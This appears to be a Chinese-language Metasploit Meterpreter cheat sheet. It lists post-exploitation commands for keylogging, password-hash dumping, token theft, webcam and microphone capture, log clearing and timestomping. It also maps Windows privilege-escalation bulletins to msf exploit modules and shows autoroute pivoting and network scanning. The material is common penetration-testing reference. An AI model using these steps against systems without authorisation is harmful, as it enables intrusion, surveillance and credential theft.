Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。
Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。客户端可以用任何语言编写,但Metasploit具有全功能的Ruby客户端API。
Core Commands ============= Command Description ------- ----------- ? 帮助文档 background 将当前meterpreter隐藏到后台 bg 同上 bgkill 关闭后台运行的meterpreter脚本 bglist 列出正在运行的meterpreter脚本 bgrun 在后台运行一个meterpreter channel 通信频道 close 关闭一个通信通道 disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit 关闭当前meterpreter会话 get_timeouts 查询当前会话延迟时间 guid 获取当前会话的GUID help 帮助文档 info 显示某个POST模块(后渗透模块)的帮助信息 irb 在当前会话打开交互式ruby shell load 加载meterpreter扩展,常用mimikatz,kiwi machine_id Get the MSF ID of the machine attached to the session migrate 迁移会话到另一个进程 pivot 建立pivot代理,用于打穿内网 pry Open the Pry debugger on the current session quit 同exit read 从某一个通信通道中读取数据 resource 执行在某个文件中存储的命令 run 执行一个meterpreter脚本或者post(后渗透)模块 sessions 快速切换会话 set_timeouts 设置当前会话的延迟时间 sleep 强迫meterpreter静默,然后重新建立连接 transport Change the current transport mechanism use load的别名 uuid 获取当前会话的uuid write 向通信通道中写入数据 Stdapi: File system Commands ============================ Command Description ------- ----------- cat 读取文件内容 cd 更改工作目录 checksum 检索文件校验和 cp 复制 dir 显示文件目录,同ls download 下载文件或目录 edit 编辑文件 getlwd 获取本地工作目录 getwd 获取工作目录 lcd 改变本地工作目录 lls 显示本地文件目录 lpwd 显示本地工作目录 ls 显示文件目录 mkdir 新建文件夹 mv 剪切 pwd 打印当前文件目录 rm 删除文件 rmdir 删除文件夹 search 查找文件 show_mount 列出所有挂载的硬盘 upload 上传 Stdapi: Networking Commands =========================== Command Description ------- ----------- arp 显示主机arp缓存 getproxy 显示当前代理设置 ifconfig 显示网卡信息 ipconfig 显示网卡信息 netstat 显示网络连接 portfwd 端口转发 resolve 解析目标主机上的一组主机名,查找ip地址和主机地址对应关系 route 显示、更改路由表 Stdapi: System Commands ======================= Command Description ------- ----------- clearev 清空时间日志 drop_token Relinquishes any active impersonation token. execute 执行命令 getenv 获取环境变量 getpid 获取当前进程id getprivs 尝试获取更多权限 getsid 获取当前进程的用户id getuid 获取uid kill 杀进程 localtime 显示主机当地时间 pgrep 通过进程名称过滤进程 pkill 通过名称杀进程 ps 列出正在运行的进程 reboot 重启远程主机 reg 修改远程主机注册表 rev2self Calls RevertToSelf() on the remote machine shell 打开远程主机shell shutdown 关闭远程主机 steal_token Attempts to steal an impersonation token from the target proce ss suspend 挂起或唤醒进程 sysinfo 获取主机系统信息 Stdapi: User interface Commands =============================== Command Description ------- ----------- enumdesktops 列出所有桌面 getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump 键盘监听 keyscan_start 键盘监听 keyscan_stop 键盘监听 screenshot 截屏 setdesktop 改变桌面 uictl Control some of the user interface components Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Stdapi: Audio Output Commands ============================= Command Description ------- ----------- play play an audio file on target system, nothing written on disk Priv: Elevate Commands ====================== Command Description ------- ----------- getsystem 尝试提高权限 Priv: Password database Commands ================================ Command Description ------- ----------- hashdump dump ash Priv: Timestomp Commands ======================== Command Description ------- ----------- timestomp 操控文件时间戳
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msf exploit(windows/local/ms16_016_webdav) > sessions -h Usage: sessions [options] or sessions [id] Active session manipulation and interaction. OPTIONS: -C <opt> Run a Meterpreter Command on the session given with -i, or all -K Terminate all sessions -S <opt> Row search filter. -c <opt> Run a command on the session given with -i, or all -d List all inactive sessions -h Help banner -i <opt> Interact with the supplied session ID -k <opt> Terminate sessions by session ID and/or range -l List all active sessions -n <opt> Name or rename a session by ID -q Quiet mode -s <opt> Run a script or module on the session given with -i, or all -t <opt> Set a response timeout (default: 15) -u <opt> Upgrade a shell to a meterpreter session on many platforms -v List all active sessions in verbose mode -x Show extended information in the session table Many options allow specifying session ranges using commas and dashes. For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
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net user
net user /domain
whoami /all
run service_manager -l
run post/multi/gather/wlan_geolocate
run post/windows/gather/enum_computers
run post/windows/wlan/wlan_profile
run vnc
run sound_recorder
run webcam
漏洞编号 | CVE编号 | 补丁编号 |
ms13_053 | CVE-2013-3129 | KB2850851 |
ms14_058 | CVE-2014-4148 | KB3000061 |
ms16_016 | CVE-2016-0051 | KB3019215 |
ms16_032 | CVE-2016-0099 | KB3135174 |
漏洞利用对应模块(PS.msf版本为metasploit v4.17.24-dev)
漏洞编号 | msf对应模块 |
ms13_053 | exploit/windows/local/ms13_053_schlamperei |
ms14_058 | exploit/windows/local/ms14_058_track_popup_menu |
ms16_016 | exploit/windows/local/ms16_016_webdav |
ms16_032 | exploit/windows/local/ms16_032_secondary_logon_handle_privesc |
run get_local_subnets result: [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Local subnet: Local subnet: meterpreter > info post/multi/manage/autoroute Name: Multi Manage Network Route via Meterpreter Session Module: post/multi/manage/autoroute Platform: Arch: Rank: Normal Provided by: todb <todb@metasploit.com> Josh Hale "sn0wfa11" <jhale85446@gmail.com> Compatible session types: Meterpreter Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command (Accepted: a dd, autoadd, print, delete, default) NETMASK no Netmask (IPv4 as "" or CIDR a s "/24" SESSION yes The session to run this module on. SUBNET no Subnet (IPv4, for example, Description: This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting. See documentation for more 'info -d' and click 'Knowledge Base' Module options (post/multi/manage/autoroute): Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) NETMASK no Netmask (IPv4 as "" or CIDR as "/24" SESSION yes The session to run this module on. SUBNET no Subnet (IPv4, for example,
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run arp_scanner -r x.x.x.x/24
run domain_list_gen
net use
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